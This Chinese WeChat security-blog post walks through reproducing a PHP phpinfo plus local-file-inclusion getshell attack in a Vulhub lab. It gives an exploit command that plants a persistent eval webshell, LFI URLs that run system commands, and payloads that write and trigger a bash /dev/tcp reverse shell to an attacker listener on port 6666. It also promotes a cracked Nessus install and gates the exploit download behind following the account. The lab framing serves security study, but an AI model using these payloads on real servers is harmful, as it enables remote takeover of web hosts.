免责声明
本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
利用场景
存在phpinfo页面,且存在文件包含漏洞,在找不到好的文件包含getshell时,可以使用。
该漏洞和php版本无关,即全版本通用。
环境搭建
Vulhub搭建参考如下:
进入到vulbub靶场的/vulhub/php/inclusion/目录
执行docker-compose up -d 创建容器(在root权限下执行)
下文出现的192.168.0.140在复现的过程中需要替换成你们vulhub搭建的ip,查看方法如下,需要注意使用docker搭建的靶场存在多张网卡,要确认好ip
确认环境
访问phpinfo页面:
http://192.168.0.140:8080/phpinfo.php
访问文件包含页面:
http://192.168.0.140:8080/lfi.php
写入shell
执行exp命令:py -2 .exp.py 192.168.0.140 8080 100
该exp写入一个永久的shell /tmp/g=eval($_REQUEST[1])')?>
命令执行
利用文件包含,执行命令
http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system(%27id%27);
写入反弹shell
通过get传递数据写入反弹shell
http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system('echo "<?php system("bash -c 'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261'");?>">/tmp/2.php');
通过构造成post传递数据写入反弹shell
http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system($_POST[s]);s=echo "<?php system("bash -c 'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261'");?>">/tmp/2.php
页面显示报错,没关系,反弹shell已经成功写入
反弹shell
使用nc.exe -lvvp 6666 监听6666端口
访问该页面利用文件包含执行反弹shell
http://192.168.0.140:8080/lfi.php?file=/tmp/2.php显示正在连接,然后得到反弹shell
获取exp
关注浪飒sec回复
221109获取exp下载地址
历史推荐
Ubuntu 20.04 离线安装破解 Nessus 10.3.0
超全Hack报告/资料/文档/书籍(不关注我你必后悔的好东西)
原文始发于微信公众号(浪飒sec):漏洞复现——php inclusion
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论